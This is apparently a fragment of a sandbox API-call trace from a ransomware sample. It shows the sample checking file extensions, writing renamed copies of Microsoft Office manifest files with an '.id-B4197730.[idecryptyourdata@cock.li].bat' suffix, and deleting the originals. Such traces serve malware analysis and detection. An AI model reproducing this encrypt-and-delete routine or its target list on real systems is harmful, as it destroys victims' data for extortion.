[0058.678] lstrlenW (lpString=".rar") returned 4 [0058.678] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString=".bz2") returned 4 [0058.678] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString=".7z") returned 3 [0058.678] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.678] lstrlenW (lpString=".dbf") returned 4 [0058.678] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.678] lstrlenW (lpString=".1cd") returned 4 [0058.678] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.678] lstrlenW (lpString=".jpg") returned 4 [0058.678] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.679] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.679] lstrlenW (lpString="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 53 [0058.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.679] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=1261) returned 1 [0058.679] CloseHandle (hObject=0x358) returned 1 [0058.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.679] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.680] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0058.680] GetLastError () returned 0x0 [0058.680] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0058.704] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0058.705] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0058.705] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.705] SetEndOfFile (hFile=0x368) returned 1 [0058.705] CloseHandle (hObject=0x368) returned 1 [0058.706] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.706] SetEndOfFile (hFile=0x358) returned 1 [0058.707] CloseHandle (hObject=0x358) returned 1 [0058.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.707] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 1 [0058.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.708] lstrlenW (lpString=".doc") returned 4 [0058.708] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.708] lstrlenW (lpString=".docx") returned 5 [0058.708] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.708] lstrlenW (lpString=".pdf") returned 4 [0058.708] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.708] lstrlenW (lpString=".xls") returned 4 [0058.708] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.708] lstrlenW (lpString=".xlsx") returned 5 [0058.708] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.708] lstrlenW (lpString=".ppt") returned 4 [0058.708] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.708] lstrlenW (lpString=".zip") returned 4 [0058.708] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.708] lstrlenW (lpString=".rar") returned 4 [0058.708] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.708] lstrlenW (lpString=".bz2") returned 4 [0058.708] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.708] lstrlenW (lpString=".7z") returned 3 [0058.708] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.709] lstrlenW (lpString=".dbf") returned 4 [0058.709] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.709] lstrlenW (lpString=".1cd") returned 4 [0058.709] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.709] lstrlenW (lpString=".jpg") returned 4 [0058.709] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.709] lstrlenW (lpString=".doc") returned 4 [0058.709] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString=".docx") returned 5 [0058.709] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.709] lstrlenW (lpString=".pdf") returned 4 [0058.709] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString=".xls") returned 4 [0058.709] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString=".xlsx") returned 5 [0058.709] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.709] lstrlenW (lpString=".ppt") returned 4 [0058.709] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.709] lstrlenW (lpString=".zip") returned 4 [0058.709] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.709] lstrlenW (lpString=".rar") returned 4 [0058.710] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.710] lstrlenW (lpString=".bz2") returned 4 [0058.710] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.710] lstrlenW (lpString=".7z") returned 3 [0058.710] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.710] lstrlenW (lpString=".dbf") returned 4 [0058.710] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.710] lstrlenW (lpString=".1cd") returned 4 [0058.710] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0058.710] lstrlenW (lpString=".jpg") returned 4 [0058.710] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.710] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.710] lstrlenW (lpString="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 53 [0058.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.710] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=1261) returned 1 [0058.711] CloseHandle (hObject=0x358) returned 1 [0058.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.711] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.711] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0058.711] GetLastError () returned 0x0 [0058.711] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0058.723] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0058.724] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0058.724] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.724] SetEndOfFile (hFile=0x368) returned 1 [0058.725] CloseHandle (hObject=0x368) returned 1 [0058.725] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.725] SetEndOfFile (hFile=0x358) returned 1 [0058.726] CloseHandle (hObject=0x358) returned 1 [0058.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.727] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 1 [0058.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.727] lstrlenW (lpString=".doc") returned 4 [0058.727] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.727] lstrlenW (lpString=".docx") returned 5 [0058.727] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.727] lstrlenW (lpString=".pdf") returned 4 [0058.727] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.727] lstrlenW (lpString=".xls") returned 4 [0058.727] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.727] lstrlenW (lpString=".xlsx") returned 5 [0058.727] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.727] lstrlenW (lpString=".ppt") returned 4 [0058.728] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.728] lstrlenW (lpString=".zip") returned 4 [0058.728] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.728] lstrlenW (lpString=".rar") returned 4 [0058.728] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString=".bz2") returned 4 [0058.728] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString=".7z") returned 3 [0058.728] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.728] lstrlenW (lpString=".dbf") returned 4 [0058.728] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.728] lstrlenW (lpString=".1cd") returned 4 [0058.728] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.728] lstrlenW (lpString=".jpg") returned 4 [0058.728] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.728] lstrlenW (lpString=".doc") returned 4 [0058.728] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString=".docx") returned 5 [0058.728] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.728] lstrlenW (lpString=".pdf") returned 4 [0058.728] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.728] lstrlenW (lpString=".xls") returned 4 [0058.729] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.729] lstrlenW (lpString=".xlsx") returned 5 [0058.729] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.729] lstrlenW (lpString=".ppt") returned 4 [0058.729] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.729] lstrlenW (lpString=".zip") returned 4 [0058.729] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.729] lstrlenW (lpString=".rar") returned 4 [0058.729] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.729] lstrlenW (lpString=".bz2") returned 4 [0058.729] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.729] lstrlenW (lpString=".7z") returned 3 [0058.729] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.729] lstrlenW (lpString=".dbf") returned 4 [0058.729] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.729] lstrlenW (lpString=".1cd") returned 4 [0058.729] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0058.729] lstrlenW (lpString=".jpg") returned 4 [0058.729] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.729] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.730] lstrlenW (lpString="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 53 [0058.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.730] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=2147) returned 1 [0058.730] CloseHandle (hObject=0x358) returned 1 [0058.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 0x220 [0058.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.730] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.730] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0058.731] GetLastError () returned 0x0 [0058.731] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x863, lpOverlapped=0x0) returned 1 [0058.742] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x870, lpOverlapped=0x0) returned 1 [0058.743] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0058.743] WriteFile (in: hFile=0x368, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.743] SetEndOfFile (hFile=0x368) returned 1 [0058.743] CloseHandle (hObject=0x368) returned 1 [0058.744] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.744] SetEndOfFile (hFile=0x358) returned 1 [0058.745] CloseHandle (hObject=0x358) returned 1 [0058.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.745] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 1 [0058.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.746] lstrlenW (lpString=".doc") returned 4 [0058.746] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.746] lstrlenW (lpString=".docx") returned 5 [0058.746] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.746] lstrlenW (lpString=".pdf") returned 4 [0058.746] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.746] lstrlenW (lpString=".xls") returned 4 [0058.746] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.746] lstrlenW (lpString=".xlsx") returned 5 [0058.746] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.746] lstrlenW (lpString=".ppt") returned 4 [0058.746] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.746] lstrlenW (lpString=".zip") returned 4 [0058.746] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.746] lstrlenW (lpString=".rar") returned 4 [0058.747] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString=".bz2") returned 4 [0058.747] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString=".7z") returned 3 [0058.747] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.747] lstrlenW (lpString=".dbf") returned 4 [0058.747] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.747] lstrlenW (lpString=".1cd") returned 4 [0058.747] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0058.747] lstrlenW (lpString=".jpg") returned 4 